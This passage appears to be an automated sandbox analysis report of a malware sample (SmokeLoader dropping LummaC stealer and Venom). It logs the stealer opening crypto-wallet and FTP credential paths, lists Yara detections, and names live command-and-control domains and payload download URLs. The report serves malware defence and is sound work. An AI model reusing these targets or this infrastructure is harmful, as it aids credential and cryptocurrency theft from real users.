Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Tries to steal Crypto Currency Wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Searches for user specific document files
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Yara detected Credential Stealer
Source: Yara match File source: 00000014.00000003.2719411420.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2718324316.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2763564207.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2707939700.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2721074628.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2711751965.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2709067186.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2748207856.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2722685463.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2773942055.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2710272272.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2775761675.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2775010312.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2718700898.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2732789726.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2727794367.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2745784061.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2719069820.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2728924066.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2750455743.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2723831402.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2754315012.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2771030562.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2730614080.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2639948784.0000000003385000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2722975569.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2722293127.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2725597045.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2710789516.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2731443501.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2727021426.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2739250905.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2752660197.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2723350462.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2717828329.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2729723839.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2742008984.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2724319284.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2719837852.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2758698968.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2641040146.000000000339A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2712752600.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2708630118.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2720461285.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2723578701.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2776713870.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2709425856.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2755765859.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2728281717.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2782316881.0000000000560000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2721584393.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2734445019.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2709861506.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 1988, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: lm.exe PID: 5724, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Go Injector
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 9.2.EF14.exe.7ff71bc40000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.EF14.exe.7ff71bc40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.2570610433.00007FF71C180000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.2414575122.00007FF71C180000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: EF14.exe PID: 3868, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\EF14.exe, type: DROPPED
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 1988, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: lm.exe PID: 5724, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected SmokeLoader
Source: Yara match File source: 00000003.00000002.1941543133.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1941477566.00000000001A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1718024777.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1717820306.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8D9E10 bind,listen,WSAGetLastError,closesocket, 19_2_6C8D9E10
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C869E10 bind,listen,WSAGetLastError,closesocket, 20_2_6C869E10
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483387 Sample: e9ddd60081c3e01d049dc4d5ed5... Startdate: 27/07/2024 Architecture: WINDOWS Score: 100 98 rentry.co 2->98 100 mzxn.ru 2->100 102 5 other IPs or domains 2->102 112 Multi AV Scanner detection for domain / URL 2->112 114 Found malware configuration 2->114 116 Malicious sample detected (through community Yara rule) 2->116 120 24 other signatures 2->120 12 e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe 2->12         started        15 adjijwj 2->15         started        signatures3 118 Connects to a pastebin service (likely for C&C) 98->118 process4 signatures5 170 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 12->170 172 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 12->172 174 Maps a DLL or memory area into another process 12->174 182 2 other signatures 12->182 17 explorer.exe 96 18 12->17 injected 176 Antivirus detection for dropped file 15->176 178 Machine Learning detection for dropped file 15->178 180 Checks if the current machine is a virtual machine (disk enumeration) 15->180 process6 dnsIp7 88 mussangroup.com 185.149.100.242, 443, 62252 VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi Turkey 17->88 90 mzxn.ru 186.145.236.93, 62233, 62234, 62235 TelmexColombiaSACO Colombia 17->90 92 8 other IPs or domains 17->92 70 C:\Users\user\AppData\Roaming\adjijwj, PE32 17->70 dropped 72 C:\Users\user\AppData\Local\TempF14.exe, PE32+ 17->72 dropped 74 C:\Users\user\AppData\Local\Temp\8EC7.exe, PE32+ 17->74 dropped 76 2 other malicious files 17->76 dropped 122 System process connects to network (likely due to code injection or exploit) 17->122 124 Benign windows process drops PE files 17->124 126 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 17->126 128 5 other signatures 17->128 22 2D42.exe 14 6 17->22         started        27 EF14.exe 2 17->27         started        29 8EC7.exe 1 17->29         started        31 3 other processes 17->31 file8 signatures9 process10 dnsIp11 104 rentry.co 104.26.2.16, 443, 62275 CLOUDFLARENETUS United States 22->104 86 C:\Users\user\AppData\...\rentry-script.ps1, ASCII 22->86 dropped 144 Suspicious powershell command line found 22->144 146 Found many strings related to Crypto-Wallets (likely being stolen) 22->146 148 Bypasses PowerShell execution policy 22->148 166 3 other signatures 22->166 33 powershell.exe 22->33         started        38 2D42.exe 22->38         started        150 Multi AV Scanner detection for dropped file 27->150 152 Writes to foreign memory regions 27->152 154 Allocates memory in foreign processes 27->154 168 2 other signatures 27->168 40 BitLockerToGo.exe 27->40         started        156 Check for Windows Defender sandbox 29->156 158 Machine Learning detection for dropped file 29->158 160 Changes memory attributes in foreign processes to executable or writable 29->160 162 Injects code into the Windows Explorer (explorer.exe) 29->162 42 conhost.exe 29->42         started        164 Windows Scripting host queries suspicious COM object (likely to drop second stage) 31->164 44 cmd.exe 31->44         started        46 conhost.exe 31->46         started        48 conhost.exe 31->48         started        file12 signatures13 process14 dnsIp15 94 store4.gofile.io 31.14.70.245, 443, 62279, 62282 LINKER-ASFR Virgin Islands (BRITISH) 33->94 78 C:\Users\user\AppData\Local\Temp\...\vm.exe, PE32 33->78 dropped 80 C:\Users\user\AppData\Local\Temp\...\g2m.dll, PE32 33->80 dropped 82 C:\Users\user\AppData\Local\Temp\...\lm.exe, PE32 33->82 dropped 84 3 other malicious files 33->84 dropped 130 Drops VBS files to the startup folder 33->130 132 Loading BitLocker PowerShell Module 33->132 134 Powershell drops PE file 33->134 50 cmd.exe 33->50         started        52 cmd.exe 33->52         started        54 conhost.exe 33->54         started        96 callosallsaospz.shop 188.114.97.3, 443, 62277, 62280 CLOUDFLARENETUS European Union 40->96 136 Query firmware table information (likely to detect VMs) 40->136 138 Found many strings related to Crypto-Wallets (likely being stolen) 40->138 140 Tries to harvest and steal ftp login credentials 40->140 142 Tries to steal Crypto Currency Wallets 40->142 56 vm.exe 44->56         started        58 conhost.exe 44->58         started        file16 signatures17 process18 process19 60 lm.exe 50->60         started        64 vm.exe 52->64         started        66 WerFault.exe 56->66         started        dnsIp20 106 liernessfornicsa.shop 172.67.213.85, 443, 62289, 62290 CLOUDFLARENETUS United States 60->106 184 Query firmware table information (likely to detect VMs) 60->184 186 Tries to harvest and steal browser information (history, passwords, etc) 60->186 188 Tries to steal Crypto Currency Wallets 60->188 68 WerFault.exe 60->68         started        108 193.222.96.24, 4449, 62293, 62342 SWISSCOMSwisscomSwitzerlandLtdCH Germany 64->108 110 94.156.79.190, 4449, 62319, 62389 NET1-ASBG Bulgaria 64->110 190 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 64->190 signatures21 process22
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
77.221.157.163
 unknown Russian Federation
30968 INFOBOX-ASInfoboxruAutonomousSystemRU true
107.173.160.139
 unknown United States
36352 AS-COLOCROSSINGUS true
107.173.160.137
 unknown United States
36352 AS-COLOCROSSINGUS true
172.67.213.85
 liernessfornicsa.shop United States
13335 CLOUDFLARENETUS true
162.0.235.84
 funrecipebooks.com Canada
22612 NAMECHEAP-NETUS true
109.172.114.212
 unknown Russian Federation
41691 SUMTEL-AS-RIPEMoscowRussiaRU true
64.190.113.113
 unknown United States
26646 TRAVELCLICKCORP1US true
94.156.79.190
 unknown Bulgaria
43561 NET1-ASBG true
186.145.236.93
 mzxn.ru Colombia
14080 TelmexColombiaSACO true
188.114.97.3
 callosallsaospz.shop European Union
13335 CLOUDFLARENETUS true
104.26.2.16
 rentry.co United States
13335 CLOUDFLARENETUS true
167.235.128.153
 unknown United States
3525 ALBERTSONSUS true
193.222.96.24
 unknown Germany
3303 SWISSCOMSwisscomSwitzerlandLtdCH true
154.144.253.197
 unknown Morocco
6713 IAM-ASMA true
185.149.100.242
 mussangroup.com Turkey
209853 VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi true
31.14.70.245
 store4.gofile.io Virgin Islands (BRITISH)
199483 LINKER-ASFR false

Contacted Domains

Name IP Active
funrecipebooks.com 162.0.235.84 true
store4.gofile.io 31.14.70.245 true
rentry.co 104.26.2.16 true
mzxn.ru 186.145.236.93 true
liernessfornicsa.shop 172.67.213.85 true
mussangroup.com 185.149.100.242 true
callosallsaospz.shop 188.114.97.3 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://100xmargin.com/tmp/index.php true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://olinsw.ws/tmp/index.php true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://mzxn.ru/tmp/index.php true
  • 2%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
callosallsaospz.shop true
  • 19%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
liernessfornicsa.shop true
  • 19%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
https://107.173.160.139/ true
  • 3%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
shepherdlyopzc.shop true
  • 19%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
upknittsoappz.shop true
  • 19%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
https://mussangroup.com/wp-content/images/pic1.jpg true
  • 6%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
https://store4.gofile.io/download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
unseaffarignsk.shop true
  • 22%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
https://callosallsaospz.shop/api false
  • Avira URL Cloud: malware
 unknown
http://wgdnb4rc.xyz/tmp/index.php true
  • Avira URL Cloud: safe
 unknown